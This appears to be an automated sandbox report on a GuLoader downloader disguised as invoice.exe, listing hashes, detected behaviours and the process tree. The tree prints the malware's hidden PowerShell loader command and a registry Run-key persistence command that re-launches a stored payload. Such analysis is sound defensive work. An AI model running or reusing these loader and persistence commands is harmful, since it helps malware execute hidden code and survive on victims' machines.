Analysis
-
max time kernel
361s -
max time network
362s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 12:36
Static task
static1
Behavioral task
behavioral1
Sample
invoice.exe
Resource
win7-20240705-en
General
-
Target
invoice.exe
-
Size
463KB
-
MD5
5cb973edda7244515c1ddf1f532b67bc
-
SHA1
e03200f1949f4c85379cb31d2d61165794efb481
-
SHA256
2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c
-
SHA512
220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed
-
SSDEEP
12288:uKYi/LALj3EpUkdwsVZKRukGeYO+NRPNTvJiYn:bFD6rXsgPQhNRPNTxiYn
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 5 IoCs
Processes:
invoice.exepowershell.exeObserverbare86.exepid process 3020 invoice.exe 3020 invoice.exe 3020 invoice.exe 1816 powershell.exe 2980 Observerbare86.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\Udmund = "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\\Backlash\\').Preseparated;%Internality% ($Skibsfart)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
Observerbare86.exepid process 2980 Observerbare86.exe 2980 Observerbare86.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeObserverbare86.exepid process 1816 powershell.exe 2980 Observerbare86.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1816 set thread context of 2980 1816 powershell.exe Observerbare86.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Observerbare86.exe nsis_installer_1 \Users\Admin\AppData\Local\Temp\Observerbare86.exe nsis_installer_2 -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1816 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
invoice.exepowershell.exeObserverbare86.execmd.exedescription pid process target process PID 3020 wrote to memory of 1816 3020 invoice.exe powershell.exe PID 3020 wrote to memory of 1816 3020 invoice.exe powershell.exe PID 3020 wrote to memory of 1816 3020 invoice.exe powershell.exe PID 3020 wrote to memory of 1816 3020 invoice.exe powershell.exe PID 1816 wrote to memory of 2980 1816 powershell.exe Observerbare86.exe PID 1816 wrote to memory of 2980 1816 powershell.exe Observerbare86.exe PID 1816 wrote to memory of 2980 1816 powershell.exe Observerbare86.exe PID 1816 wrote to memory of 2980 1816 powershell.exe Observerbare86.exe PID 1816 wrote to memory of 2980 1816 powershell.exe Observerbare86.exe PID 1816 wrote to memory of 2980 1816 powershell.exe Observerbare86.exe PID 2980 wrote to memory of 1536 2980 Observerbare86.exe cmd.exe PID 2980 wrote to memory of 1536 2980 Observerbare86.exe cmd.exe PID 2980 wrote to memory of 1536 2980 Observerbare86.exe cmd.exe PID 2980 wrote to memory of 1536 2980 Observerbare86.exe cmd.exe PID 1536 wrote to memory of 1144 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1144 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1144 1536 cmd.exe reg.exe PID 1536 wrote to memory of 1144 1536 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\invoice.exe"C:\Users\Admin\AppData\Local\Temp\invoice.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Udlbstidspunkter=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi';$Subdelegate=$Udlbstidspunkter.SubString(69683,3);.$Subdelegate($Udlbstidspunkter)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe"C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"4⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:1144
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD59f369129a14ef6d8d0867ec4d9b6eb19
SHA12a56ca0fb0b4590c030d293a7829ac087212821b
SHA2569f288ab07bf267422b4670dfd87f373115682a026e63db13e9bab44977c8cc0f
SHA512d8fd8aeabfa1bd47f0d3ca2208ac9154496d9b38ef6b185a3c9bf26877539f57a5b0e022c02ae2121a68f74ab13f45f446124dc6d8d90020defd1abeb2825326
-
Filesize
327KB
MD5edd82166d9af4f94ca8413254ad27eee
SHA1cbe26db0839f63fc825205293f32660e8fa4b63c
SHA256b1246b2938bd2fa73f3a6679ea5040697db9a6ace3607fd2f20c5db2eeecc907
SHA5127f25fac516c23cdddfbf8f22e3f29e23c599ceacdfcf5d84531535e7838114bc982bef629ab219c7a17bcbc9ac97f159642297da7e2c1d8fa8d921917986fae8
-
Filesize
1KB
MD5a4240ca5f5d3795a423c50c6e7c436dd
SHA140893606a5fb47d7f46065d230373ea08f8ed496
SHA256c543244dfa80165283c6cb6d4a133164b98e7ef022d1bc268c6b56d9addfc83b
SHA512bef519e0dfee8a9f628ea402b18b51aeb9b58fe59b121e9dc14384dae56f92e309f32c0ff6fae5a5873f4069043cf184d56d70fb7644cd29481e5174b2d38b1e
-
Filesize
463KB
MD55cb973edda7244515c1ddf1f532b67bc
SHA1e03200f1949f4c85379cb31d2d61165794efb481
SHA2562926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c
SHA512220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed
-
Filesize
7KB
MD5350a507070ed063ac6a511aeef67861a
SHA1cf647b90a1212e090f1d236d1b50a5010cbf3bae
SHA2565c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab
SHA512cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468
-
Filesize
9KB
MD513b6a88cf284d0f45619e76191e2b995
SHA109ebb0eb4b1dca73d354368414906fc5ad667e06
SHA256cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911
SHA5122aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2